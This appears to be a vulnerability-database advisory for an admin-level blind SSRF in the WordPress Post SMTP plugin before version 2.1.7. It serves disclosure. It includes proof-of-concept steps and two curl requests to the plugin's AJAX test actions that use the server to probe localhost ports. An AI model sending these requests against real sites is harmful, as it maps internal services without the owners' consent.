Lucene search

K
wpexploitRaad Haddad of Cloudyrion GmbHWPEX-ID:DC99AC40-646A-4F8E-B2B9-DC55D6D4C55C
HistorySep 05, 2022 - 12:00 a.m.

Post SMTP < 2.1.7 - Admin+ Blind SSRF

2022-09-0500:00:00
Raad Haddad of Cloudyrion GmbH
328
post smtp
admin+
blind ssrf
vulnerable site
ssrf exploit
security document

0.001 Low

EPSS

Percentile

43.1%

The plugin does not have proper authorisation in some AJAX actions, which could allow high privilege users such as admin to perform blind SSRF on multisite installations for example.

# Navigate to https://example.com/wp-admin/admin.php?page=postman%2Fport_test

# Inside "Outgoing Mail Server Hostname" parameter fill the target host and port number

localhost:44

# If it takes too much time to return the results, this means that the port is open

--- curl requests ---

curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true' -X POST -H 'Cookie: WP COOKIES' --data 'action=postman_test_smtps&hostname=localhost%3A44&port=465&security=6b297e1647'
curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true' -X POST -H 'Cookie: WP COOKIES' --data 'action=postman_test_port&hostname=localhost%3A1338&port=25&security=6b297e1647'

0.001 Low

EPSS

Percentile

43.1%

Related for WPEX-ID:DC99AC40-646A-4F8E-B2B9-DC55D6D4C55C